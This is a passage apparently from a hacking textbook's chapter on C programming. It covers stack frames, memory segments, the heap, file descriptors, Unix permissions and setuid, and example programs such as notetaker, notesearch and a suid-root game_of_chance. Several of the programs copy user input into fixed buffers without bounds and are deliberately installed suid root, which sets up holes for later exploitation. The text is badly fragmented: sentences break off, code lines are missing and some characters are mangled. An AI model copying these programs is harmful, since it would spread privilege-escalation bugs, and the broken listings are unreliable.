test_function(), so continuing will build the stack frame
...
The local variables (flag and
buffer) are referenced relative to the frame pointer (EBP)
...

Breakpoint 2, test_function (a=1, b=2, c=3, d=4) at stack_example
...

(gdb) print $ebp-12
$1 = (void *) 0xbffff7dc
(gdb) print $ebp-40
$2 = (void *) 0xbffff7c0
(gdb) x/16xw $esp
0xbffff7c0:
0x00000000 0x08049548 0xbffff7d8 0x08048249
0xbffff7d0: 0xb7f9f729 0xb7fd6ff4 0xbffff808 0x080483b9
0xbffff7e0: 0xb7fd6ff4
0xbffff7f0:
(gdb)

0xbffff89c

0xbffff808

0x0804838b

0x00000001 0x00000002 0x00000003 0x00000004

The stack frame is shown on the stack at the end
...
Above that is the saved frame pointer of
0xbffff808 ( ), which is what EBP was in the previous stack frame
...
Calculating
their relative addresses to EBP show their exact locations in the stack frame
...
The extra space in the stack frame is just padding
...
If
another function was called within the function, another stack frame would be
pushed onto the stack, and so on
...
This
behavior is the reason this segment of memory is organized in a FILO data
structure
...
Since most
people are familiar with seeing numbered lists that count downward, the smaller
memory addresses are shown at the top
...
Most debuggers also display memory in this style, with the
smaller memory addresses at the top and the higher ones at the bottom
...
This minimizes wasted space, allowing the stack to
be larger if the heap is small and vice versa
...

Memory Segments in C
In C, as in other compiled languages, the compiled code goes into the text
segment, while the variables reside in the remaining segments
...
Variables that are defined outside of any functions are considered to be
global
...
If static or global variables are initialized with data, they
are stored in the data memory segment; otherwise, these variables are put in the
bss memory segment
...
Usually, pointers
are used to reference memory on the heap
...
Since the stack can contain
many different stack frames, stack variables can maintain uniqueness within
different functional contexts
...
c program will help explain
these concepts in C
...
c
#include ...

int stack_var; // Notice this variable has the same name as the one in main()
...

printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var);
printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var);
// These variables are in the bss segment
...

printf("heap_var is at address 0x%08x\n\n", heap_var_ptr);
// These variables are in the stack segment
...
The global and static variables are declared as described earlier, and
initialized counterparts are also declared
...
The heap
variable is actually declared as an integer pointer, which will point to memory
allocated on the heap memory segment
...
Since the newly allocated memory could be of any data
type, the malloc() function returns a void pointer, which needs to be typecast
into an integer pointer
...
c
reader@hacking:~/booksrc $
...
out
global_initialized_var is at address 0x080497ec
static_initialized_var is at address 0x080497f0
static_var is at address 0x080497f8
global_var is at address 0x080497fc

heap_var is at address 0x0804a008
stack_var is at address 0xbffff834
the function's stack_var is at address 0xbffff814
reader@hack ing:~/booksrc $

The first two initialized variables have the lowest memory addresses, since they
are located in the data memory segment
...

These memory addresses are slightly larger than the previous variables'
addresses, since the bss segment is located below the data segment
...

The heap variable is stored in space allocated on the heap segment, which is
located just below the bss segment
...
Finally, the last two
stack_vars have very large memory addresses, since they are located in the stack
segment
...
This allows both
memory segments to be dynamic without wasting space in memory
...
The second stack_var in function() has its own unique context, so
that variable is stored within a different stack frame in the stack segment
...
Since the
stack grows back up toward the heap segment with each new stack frame, the
memory address for the second stack_var(0xbffff814) is smaller than the
address for the first stack_var (0xbffff834) found within main()'s context
...
However, using the heap requires a bit more effort
...
This function accepts a size as its only argument and reserves
that much space in the heap segment, returning the address to the start of this
memory as a void pointer
...
The
corresponding deallocation function is free()
...
These relatively simple functions are demonstrated in
heap_example
...

heap_example
...
h>

#include ...
h>
int main(int argc, char *argv[]) {
char *char_ptr; // A char pointer
int *int_ptr; // An integer pointer
int mem_size;
if (argc < 2) // If there aren't command-line arguments,
mem_size = 50; // use 50 as the default value
...
\n");
exit(-1);
}
strcpy(char_ptr, "This is memory is located on the heap
...
\n");
exit(-1);
}
*int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing
...
\n");
free(char_ptr); // Freeing heap memory
printf("\t[+] allocating another 15 bytes for char_ptr\n");
char_ptr = (char *) malloc(15); // Allocating more heap memory
if(char_ptr == NULL) { // Error checking, in case malloc() fails
fprintf(stderr, "Error: could not allocate heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
Then it uses the malloc() and free()
functions to allocate and deallocate memory on the heap
...
Since malloc() doesn't know what type of memory it's allocating, it
returns a void pointer to the newly allocated heap memory, which must be
typecast into the appropriate type
...
If the allocation
fails and the pointer is NULL, fprintf() is used to print an error message to
standard error and the program exits
...
This function will be explained more later, but for
now, it's just used as a way to properly display an error
...

reader@hacking:~/booksrc $ gcc -o heap_example heap_example
...
/heap_example
[+] allocating 50 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a050) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

In the preceding output, notice that each block of memory has an incrementally
higher memory address in the heap
...
The heap allocation functions control this behavior,
which can be explored by changing the size of the initial memory allocation
...
/heap_example 100
[+] allocating 100 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a008) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

If a larger block of memory is allocated and then deallocated, the final 15-byte
allocation will occur in that freed memory space, instead
...
Often, simple informative printf()
statements and a little experimentation can reveal many things about the
underlying system
...
c, there were several error checks for the malloc() calls
...
But with multiple malloc() calls, this error-checking code
needs to appear in multiple places
...
Since all the error-checking code is basically the same
for every malloc() call, this is a perfect place to use a function instead of
repeating the same instructions in multiple places
...
c for an example
...
c
#include ...
h>
#include ...

else
mem_size = atoi(argv[1]);
printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
char_ptr = (char *) errorchecked_malloc(mem_size); // Allocating heap memory
strcpy(char_ptr, "This is memory is located on the heap
...

printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);
printf("\t[-] freeing char_ptr's heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
\n");
exit(-1);
}
return ptr;
}

The errorchecked_heap
...
c code, except the heap memory allocation and error checking has
been gathered into a single function
...
This lets the
compiler know that there will be a function called errorchecked_malloc() that
expects a single, unsigned integer argument and returns a void pointer
...

The function itself is quite simple; it just accepts the size in bytes to allocate and
attempts to allocate that much memory using malloc()
...
This way, the custom
errorchecked_malloc() function can be used in place of a normal malloc(),
eliminating the need for repetitious error checking afterward
...

Building on Basics
Once you understand the basic concepts of C programming, the rest is pretty
easy
...
In fact, if the
functions were removed from any of the preceding programs, all that would
remain are very basic statements
...

File descriptors use a set of low-level I/O functions, and filestreams are a higher-level
form of buffered I/O that is built on the lower-level functions
...
In this book, the focus will be on the low-level I/O functions that use file
descriptors
...
Because this number
is unique among the other books in a bookstore, the cashier can scan the number
at checkout and use it to reference information about this book in the store's
database
...
Four common functions that use file descriptors are open(), close(),
read(), and write()
...
The
open() function opens a file for reading and/or writing and returns a file
descriptor
...
The file descriptor is passed as an argument to the other
functions like a pointer to the opened file
...
The read() and write() functions' arguments
are the file descriptor, a pointer to the data to read or write, and the number of
bytes to read or write from that location
...
These flags and their usage will be explained in depth later, but
for now let's take a look at a simple note-taking program that uses file descriptors
—simplenote
...
This program accepts a note as a command-line argument and
then adds it to the end of the file /tmp/notes
...
Other
functions are used to display a usage message and to handle fatal errors
...

simplenote
...
h>
#include ...
h>
#include ...
h>
void usage(char *prog_name, char *filename) {
printf("Usage: %s \n", prog_name, filename);
exit(0);
}
void fatal(char *); // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper
int main(int argc, char *argv[]) {
int fd; // file descriptor
char *buffer, *datafile;
buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/tmp/notes");
if(argc < 2) // If there aren't command-line arguments,
usage(argv[0], datafile); // display usage message and exit
...

printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] data file @ %p: \'%s\'\n", datafile, datafile);
strncat(buffer, "\n", 1); // Add a newline on the end
...
\n");
free(buffer);
free(datafile);
}
// A function to display an error message and then exit
void fatal(char *message) {
char error_message[100];
strcpy(error_message, "[!!] Fatal Error ");
strncat(error_message, message, 83);
perror(error_message);
exit(-1);
}
// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
void *ptr;
ptr = malloc(size);
if(ptr == NULL)
fatal("in ec_malloc() on memory allocation");

return ptr;
}

Besides the strange-looking flags used in the open() function, most of this code
should be readable
...
The strlen() function accepts a string and returns its length
...
The perror() function is short for print error and is used in fatal() to print
an additional error message (if it exists) before exiting
...
c
reader@hacking:~/booksrc $
...
/simplenote
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
great, it works
reader@hacking:~/booksrc $

The output of the program's execution is pretty self-explanatory, but there are
some things about the source code that need further explanation
...
h
and sys/stat
...
The first set of flags is found in fcntl
...
The access mode must use at least one of the following three flags:
Open file for read-only access
...

O_RDWR Open file for both read and write access
...
A few of the more common and useful of these flags areas follows:
Write data at the end of the file
...

O_CREAT Create the file if it doesn't exist
...

When two bits enter an OR gate, the result is 1 if either the first bit or the second
bit is 1
...
Full 32-bit values can use these bitwise operators to perform
logic operations on each corresponding bit
...
c and the
program output demonstrate these bitwise operations
...
c
#include ...

bit_b = (i & 1); // Get the first bit
...

bit_b = (i & 1); // Get the first bit
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
bitwise OR operator |
0 | 0 = 0
0 | 1 = 1
1 | 0 = 1
1 | 1 = 1
bitwise AND operator &
0 & 0 = 0
0 & 1 = 0
1 & 0 = 0
1 & 1 = 1
reader@hacking:~/booksrc $

The flags used for the open() function have values that correspond to single bits
...
The fcntl_flags
...
h and how they combine with each other
...
c
#include ...
h>
void display_flags(char *, unsigned int);
void binary_print(unsigned int);
int main(int argc, char *argv[]) {
display_flags("O_RDONLY\t\t", O_RDONLY);
display_flags("O_WRONLY\t\t", O_WRONLY);
display_flags("O_RDWR\t\t\t", O_RDWR);
printf("\n");
display_flags("O_APPEND\t\t", O_APPEND);
display_flags("O_TRUNC\t\t\t", O_TRUNC);
display_flags("O_CREAT\t\t\t", O_CREAT);

printf("\n");
display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT);
}
void display_flags(char *label, unsigned int value) {
printf("%s\t: %d\t:", label, value);
binary_print(value);
printf("\n");
}
void binary_print(unsigned int value) {
unsigned int mask = 0xff000000; // Start with a mask for the highest byte
...

unsigned int byte, byte_iterator, bit_iterator;
for(byte_iterator=0; byte_iterator < 4; byte_iterator++) {
byte = (value & mask) / shift; // Isolate each byte
...

if(byte & 0x80) // If the highest bit in the byte isn't 0,
printf("1"); // print a 1
...

byte *= 2; // Move all the bits to the left by 1
...

shift /= 256; // Move the bits in shift right by 8
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
O_RDONLY : 0 : 00000000 00000000 00000000 00000000
O_WRONLY : 1 : 00000000 00000000 00000000 00000001
O_RDWR : 2 : 00000000 00000000 00000000 00000010
O_APPEND : 1024 : 00000000 00000000 00000100 00000000
O_TRUNC : 512 : 00000000 00000000 00000010 00000000
O_CREAT : 64 : 00000000 00000000 00000000 01000000
O_WRONLY|O_APPEND|O_CREAT : 1089 : 00000000 00000000 00000100 01000001
$

Using bit flags in combination with bitwise logic is an efficient and commonly used
technique
...
In
fcntl_flags
...
This technique only works when all the bits
are unique, though
...
This
argument uses bit flags defined in sys/stat
...

Give the file read permission for the user (owner)
...

S_IXUSR Give the file execute permission for the user (owner)
...

S_IWGRP Give the file write permission for the group
...

S_IROTH Give the file read permission for other (anyone)
...

S_IXOTH Give the file execute permission for other (anyone)
...
If they don't make sense, here's a crash course in Unix file
permissions
...
These values can be displayed using ls -l
and are shown below in the following output
...
c
reader@hacking:~/booksrc $

For the /etc/passwd file, the owner is root and the group is also root
...

Read, write, and execute permissions can be turned on and off for three different
fields: user, group, and other
...

These fields are also displayed in the front of the ls -l output
...
The next three characters display the group permissions,
and the last three characters are for the other permissions
...

Each permission corresponds to a bit flag; read is 4 (100 in binary), write is 2
(010 in binary), and execute is 1 (001 in binary)
...
These values can be added together to define
permissions for user, group, and other using the chmod command
...
c
reader@hacking:~/booksrc $ ls -l simplenote
...
c
reader@hacking:~/booksrc $ chmod ugo-wx simplenote
...
c
-r-------- 1 reader reader 1826 2007-09-07 02:51 simplenote
...
c
reader@hacking:~/booksrc $ ls -l simplenote
...
c

reader@hacking:~/booksrc $

The first command (chmod 721) gives read, write, and execute permissions to the
user, since the first number is 7 (4 + 2 + 1), write and execute permissions to
group, since the second number is 3 (2 + 1), and only execute permission to
other, since the third number is 1
...
In the next chmod command, the argument ugo-wx means Subtract
write and execute permissions from user, group, and other
...

In the simplenote program, the open() function uses S_IRUSR|S_IWUSR for its
additional permission argument, which means the /tmp/notes file should only have
user read and write permission when it is created
...
This user ID can be
displayed using the id command
...
The su command can be used to switch to a different user,
and if this command is run as root, it can be done without a password
...
On the LiveCD,
sudo has been configured so it can be executed without a password, for
simplicity's sake
...

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ id
uid=501(jose) gid=501(jose) groups=501(jose)
jose@hacking:/home/reader/booksrc $

As the user jose, the simplenote program will run as jose if it is executed, but it
won't have access to the /tmp/notes file
...

jose@hacking:/home/reader/booksrc $ ls -l /tmp/notes
-rw------- 1 reader reader 36 2007-09-07 05:20 /tmp/notes
jose@hacking:/home/reader/booksrc $
...
For example, the /etc/passwd file contains account information for
every user on the system, including each user's default login shell
...
This program needs to
be able to make changes to the /etc/passwd file, but only on the line that pertains
to the current user's account
...
This is an additional file permission bit that can be set
using chmod
...

reader@hacking:~/booksrc $ which chsh
/usr/bin/chsh
reader@hacking:~/booksrc $ ls -l /usr/bin/chsh /etc/passwd
-rw-r--r-- 1 root root 1424 2007-09-06 21:05 /etc/passwd
-rwsr-xr-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh
reader@hacking:~/booksrc $

The chsh program has the setuid flag set, which is indicated by an s in the ls
output above
...
The
/etc/passwd file that chsh writes to is also owned by root and only allows the
owner to write to it
...
This means that a running
program has both a real user ID and an effective user ID
...
c
...
c
#include ...
c are as follows
...
c
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 reader reader 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
c, both user IDs are shown to be 999 when uid_demo is
executed, since 999 is the user ID for reader
...
The
program can still be executed, since it has execute permission for other, and it
shows that both user IDs remain 999, since that's still the ID of the user
...
/uid_demo
chmod: changing permissions of `
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwsr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
The chmod u+s command turns on the setuid permission,
which can be seen in the following ls -l output
...
This is how the chsh program is able to allow any user to
change his or her login shell stored in /etc/passwd
...
The next
program will be a modification of the simplenote program; it will also record the
user ID of each note's original author
...

The ec_malloc() and fatal() functions have been useful in many of our
programs
...

hacking
...
h, the functions can just be included
...
If the filename is surrounded by
quotes, the compiler looks in the current directory
...
h is in
the same directory as a program, it can be included with that program by typing
#include "hacking
...

The changed lines for the new notetaker program (notetaker
...

notetaker
...
h>
#include ...
h>
#include ...
h>
#include "hacking
...

strcpy(buffer, argv[1]); // Copy into buffer
...

// Writing data
if(write(fd, &userid, 4) == -1) // Write user ID before note data
...

if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
The getuid() function is used to get the real
user ID, which is written to the datafile on the line before the note's line is
written
...

reader@hacking:~/booksrc $ gcc -o notetaker notetaker
...
/notetaker
reader@hacking:~/booksrc $ sudo chmod u+s
...
/notetaker
-rwsr-xr-x 1 root root 9015 2007-09-07 05:48
...
/notetaker "this is a test of multiuser notes"
[DEBUG] buffer @ 0x804a008: 'this is a test of multiuser notes'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
Now when the program is
executed, the program runs as the root user, so the file /var/notes is also owned
by root when it is created
...
this is a t|
00000010 65 73 74 20 6f 66 20 6d 75 6c 74 69 75 73 65 72 |est of multiuser|
00000020 20 6e 6f 74 65 73 0a | notes
...
Because of

little-endian architecture, the 4 bytes of the integer 999 appear reversed in
hexadecimal (shown in bold above)
...
The notesearch
...
Additionally, an optional
command-line argument can be supplied for a search string
...

notesearch
...
h>
#include ...
h>
#include ...
h"
#define FILENAME "/var/notes"
int print_notes(int, int, char *); // Note printing function
...

int search_note(char *, char *); // Search for keyword function
...

userid = getuid();
fd = open(FILENAME, O_RDONLY); // Open the file for read-only access
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0
...

note_buffer[note_length] = 0; // Terminate the string
...

return 1;
}
// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note
...

if(read(fd, ¬e_uid, 4) != 4) // Read the uid data
...

if(read(fd, &byte, 1) != 1) // Read the newline separator
...

if(read(fd, &byte, 1) != 1) // Read a single byte
...

length++;
}
}
lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes
...

int search_note(char *note, char *keyword) {
int i, keyword_length, match=0;
keyword_length = strlen(keyword);
if(keyword_length == 0) // If there is no search string,
return 1; // always "match"
...

if(note[i] == keyword[match]) // If byte matches keyword,
match++; // get ready to check the next byte;
else { // otherwise,
if(note[i] == keyword[0]) // if that byte matches first keyword byte,
match = 1; // start the match count at 1
...

}
if(match == keyword_length) // If there is a full match,
return 1; // return matched
...

}

Most of this code should make sense, but there are some new concepts
...
Also, the function

lseek() is used to rewind the read position in the file
...
Since
this turns out to be a negative number, the position is moved backward by length
bytes
...
c
reader@hacking:~/booksrc $ sudo chown root:root
...
/notesearch
reader@hacking:~/booksrc $
...
But
this is just a single user; what happens if a different user uses the notetaker and
notesearch programs?
reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $
...

jose@hacking:/home/reader/booksrc $
...
This means that
value is added to all notes written with notetaker, and only notes with a matching
user ID will be displayed by the notesearch program
...
/notetaker "This is another note for the reader user"
[DEBUG] buffer @ 0x804a008: 'This is another note for the reader user'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
[DEBUG] found a 41 byte note for user id 999
This is another note for the reader user
-------[ end of note data ]-------
reader@hacking:~/booksrc $

Similarly, all notes for the user reader have the user ID 999 attached to them
...

This is very similar to how the /etc/passwd file stores user information for all
users, yet programs like chsh and passwd allow any user to change his own shell
or password
...
In C, structs are variables that can contain many other variables
...

A simple example will suffice for now
...
h
...

struct tm {
int tm_sec; /* seconds */
int tm_min; /* minutes */
int tm_hour; /* hours */
int tm_mday; /* day of the month */
int tm_mon; /* month */
int tm_year; /* year */
int tm_wday; /* day of the week */
int tm_yday; /* day in the year */
int tm_isdst; /* daylight saving time */
};

After this struct is defined, struct tm becomes a usable variable type, which can
be used to declare variables and pointers with the data type of the tm struct
...
c program demonstrates this
...
h is included, the tm
struct is defined, which is later used to declare the current_time and time_ptr
variables
...
c
#include ...
h>
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, day, month, year;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...

Time on Unix systems is kept relative to this rather arbitrary point in time, which
is also known as the epoch
...
The pointer time_ptr has already been set to the address of
current_time, an empty tm struct
...
The elements of structs can be accessed in
three different ways; the first two are the proper ways to access struct elements,
and the third is a hacked solution
...
Therefore, current_time
...
Pointers to structs are often used, since it is
much more efficient to pass a four-byte pointer than an entire data structure
...
When
using a struct pointer like time_ptr, struct elements can be similarly accessed by
the struct element's name, but using a series of characters that looks like an
arrow pointing right
...
The seconds could be
accessed via either of these proper methods, using the tm_sec element or the tm
struct, but a third method is used
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311588
Current time is: 04:19:48
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311600
Current time is: 04:20:00
reader@hacking:~/booksrc $

The program works as expected, but how are the seconds being accessed in the
tm struct? Remember that in the end, it's all just memory
...

In the line second = *((int *) time_ptr), the variable time_ptr is typecast
from a tm struct pointer to an integer pointer
...
Since the address to
the tm struct also points to the first element of this struct, this will retrieve the
integer value for tm_sec in the struct
...
c code (time_example2
...
This shows that the elements of tm struct are right next to each
other in memory
...

time_example2
...
h>

#include ...

printf("\n");
}
printf("\n");
}
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, i, *int_ptr;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...

int_ptr = (int *) time_ptr;
for(i=0; i < 3; i++) {
printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr);
int_ptr++; // Adding 1 to int_ptr adds 4 to the address,
} // since an int is 4 bytes in size
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311744
Current time is: 04:22:24
bytes of struct located at 0xbffff7f0
18 00 00 00 16 00 00 00 04 00 00 00 09 00 00 00
08 00 00 00 6b 00 00 00 00 00 00 00 fb 00 00 00
00 00 00 00 00 00 00 00 28 a0 04 08
int_ptr @ 0xbffff7f0 : 24
int_ptr @ 0xbffff7f4 : 22
int_ptr @ 0xbffff7f8 : 4
reader@hacking:~/booksrc $

While struct memory can be accessed this way, assumptions are made about the
type of variables in the struct and the lack of any padding between variables
...

Function Pointers
A pointer simply contains a memory address and is given a data type that describes
where it points
...
The funcptr_example
...

funcptr_example
...
h>
int func_one() {
printf("This is function one\n");
return 1;
}
int func_two() {
printf("This is function two\n");
return 2;
}
int main() {
int value;
int (*function_ptr) ();
function_ptr = func_one;
printf("function_ptr is 0x%08x\n", function_ptr);
value = function_ptr();
printf("value returned was %d\n", value);
function_ptr = func_two;
printf("function_ptr is 0x%08x\n", function_ptr);
value = function_ptr();
printf("value returned was %d\n", value);
}

In this program, a function pointer aptly named function_ptr is declared in
main()
...
The output below shows the
compilation and execution of this source code
...
c
reader@hacking:~/booksrc $
...
out
function_ptr is 0x08048374
This is function one
value returned was 1
function_ptr is 0x0804838d
This is function two
value returned was 2

reader@hacking:~/booksrc $

Pseudo-random Numbers
Since computers are deterministic machines, it is impossible for them to produce
truly random numbers
...

The pseudo-random number generator functions fill this need by generating a
stream of numbers that is pseudo-random
...
Deterministic
machines cannot produce true randomness, but if the seed value of the pseudorandom generation function isn't known, the sequence will seem random
...
These functions and RAND_MAX are defined in stdlib
...
While the
numbers rand() returns will appear to be random, they are dependent on the
seed value provided to srand()
...
One common practice is to use the number of seconds since
epoch (returned from the time() function) as the seed
...
c
program demonstrates this technique
...
c
#include ...
h>
int main() {
int i;
printf("RAND_MAX is %u\n", RAND_MAX);
srand(time(0));
printf("random values from 0 to RAND_MAX\n");
for(i=0; i < 8; i++)
printf("%d\n", rand());
printf("random values from 1 to 20\n");
for(i=0; i < 8; i++)
printf("%d\n", (rand()%20)+1);
}

Notice how the modulus operator is used to obtain random values from 1 to 20
...
c
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
815015288
1315541117
2080969327
450538726
710528035
907694519

1525415338
1843056422
random values from 1 to 20
2
3
8
5
9
1
4
20
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
678789658
577505284
1472754734
2134715072
1227404380
1746681907
341911720
93522744
random values from 1 to 20
6
16
12
19
8
19
2
1
reader@hacking:~/booksrc $

The program's output just displays random numbers
...

A Game of Chance
The final program in this section is a set of games of chance that use many of the
concepts we've discussed
...
It has three different game functions,
which are called using a single global function pointer, and it uses structs to hold
data for the player, which is saved in a file
...
The
game_of_chance
...

game_of_chance
...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#define DATAFILE "/var/chance
...

if(get_player_data() == -1) // Try to read player data from file
...

while(choice != 7) {
printf("-=[ Game of Chance Menu ]=-\n");
printf("1 - Play the Pick a Number game\n");
printf("2 - Play the No Match Dealer game\n");
printf("3 - Play the Find the Ace game\n");
printf("4 - View current high score\n");
printf("5 - Change your user name\n");
printf("6 - Reset your account at 100 credits\n");
printf("7 - Quit\n");
printf("[Name: %s]\n", player
...
credits);
scanf("%d", &choice);
if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set
if(choice == 1) // then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game(); // Play the game
...
\n\n");
}
else if (choice == 6) {
printf("\nYour account has been reset with 100 credits
...
credits = 100;
}
}
update_player_data();
printf("\nThanks for playing! Bye
...
It returns -1 if it is unable to find player
// data for the current uid
...

while(entry
...

read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading
...

if(read_bytes < sizeof(struct user)) // This means that the end of file was reached
...

return 1; // Return a success
...

// It will create a new player account and append it to the file
...
uid = getuid();
player
...
credits = 100;

fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(fd == -1)
fatal("in register_new_player() while opening file");
write(fd, &player, sizeof(struct user));
close(fd);
printf("\nWelcome to the Game of Chance %s
...
name);
printf("You have been given %u credits
...
credits);
}
// This function writes the current player data to the file
...

void update_player_data() {
int fd, i, read_uid;
char burned_byte;
fd = open(DATAFILE, O_RDWR);
if(fd == -1) // If open fails here, something is really wrong
...

while(read_uid != player
...

for(i=0; i < sizeof(struct user) - 4; i++) // Read through the
read(fd, &burned_byte, 1); // rest of that struct
...

}
write(fd, &(player
...

write(fd, &(player
...

write(fd, &(player
...

close(fd);
}
// This function will display the current high score and
// the name of the person who set that high score
...

if(entry
...
highscore; // set top_score to that score
strcpy(top_name, entry
...

}
}
close(fd);
if(top_score > player
...
highscore);
printf("======================================================\n\n");
}
// This function simply awards the jackpot for the Pick a Number game
...
credits += 100;
}
// This function is used to input the player name, since
// scanf("%s", &whatever) will stop input at the first space
...

name_ptr = (char *) &(player
...

*name_ptr = input_char; // Put the input char into name field
...

name_ptr++; // Increment the name pointer
...

}
// This function prints the 3 cards for the Find the Ace game
...
If the user_pick is
// -1, then the selection numbers are displayed
...
_
...
_
...
_
...
It expects the available credits and the
// previous wager as arguments
...
The function
// returns -1 if the wager is too big or too little, and it returns
// the wager amount otherwise
...

printf("Nice try, but you must wager a positive number!\n");
return -1;
}
total_wager = previous_wager + wager;
if(total_wager > available_credits) { // Confirm available credits
printf("Your total wager of %d is more than you have!\n", total_wager);
printf("You only have %d available credits, try again
...
It also writes the new credit totals to file
// after each game is played
...
current_game);
if(player
...
credits > player
...
highscore = player
...

printf("\nYou now have %u credits\n", player
...

printf("Would you like to play again? (y/n) ");
selection = '\n';
while(selection == '\n') // Flush any extra newlines
...

}
}
// This function is the Pick a Number game
...

int pick_a_number() {
int pick, winning_number;
printf("\n####### Pick a Number ######\n");
printf("This game costs 10 credits to play
...

if(player
...
That's not enough to play!\n\n", player
...
credits -= 10; // Deduct 10 credits
...
\n");
printf("Pick a number between 1 and 20: ");
scanf("%d", &pick);
printf("The winning number is %d\n", winning_number);
if(pick == winning_number)
jackpot();
else
printf("Sorry, you didn't win
...

// It returns -1 if the player has 0 credits
...
\n");
printf("The dealer will deal out 16 random numbers between 0 and 99
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");
return -1;
}
while(wager == -1)
wager = take_wager(player
...

printf("%2d\t", numbers[i]);
if(i%8 == 7) // Print a line break every 8 numbers
...

j = i + 1;
while(j < 16) {
if(numbers[i] == numbers[j])
match = numbers[i];
j++;
}
}
if(match != -1) {
printf("The dealer matched the number %d!\n", match);
printf("You lose %d credits
...
credits -= wager;
} else {
printf("There were no matches! You win %d credits!\n", wager);
player
...

// It returns -1 if the player has 0 credits
...

printf("******* Find the Ace *******\n");
printf("In this game, you can wager up to all of your credits
...
\n");
printf("If you find the ace, you will win your wager
...
\n");
printf("At this point, you may either select a different card or\n");
printf("increase your wager
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");

return -1;
}

while(wager_one == -1) // Loop until valid wager is made
...
credits, 0);
print_cards("Dealing cards", cards, -1);
pick = -1;
while((pick < 1) || (pick > 3)) { // Loop until valid pick is made
...

i=0;
while(i == ace || i == pick) // Keep looping until
i++; // we find a valid queen to reveal
...

printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n");
printf("Select c or i: ");
choice_two = '\n';
while(choice_two == '\n') // Flush extra newlines
...

invalid_choice=0; // This is a valid choice
...

wager_two = take_wager(player
...

i = invalid_choice = 0; // Valid choice
while(i == pick || cards[i] == 'Q') // Loop until the other card
i++; // is found,
pick = i; // and then swap pick
...

if(ace == i)
cards[i] = 'A';
else
cards[i] = 'Q';
}
print_cards("End result", cards, pick);

if(pick == ace) { // Handle win
...
credits += wager_one;
if(wager_two != -1) {
printf("and an additional %d credits from your second wager!\n", wager_two);
player
...

printf("You have lost %d credits from your first wager\n", wager_one);
player
...
credits -= wager_two;

}
}
return 0;
}

Since this is a multi-user program that writes to a file in the /var directory, it must
be suid root
...
c
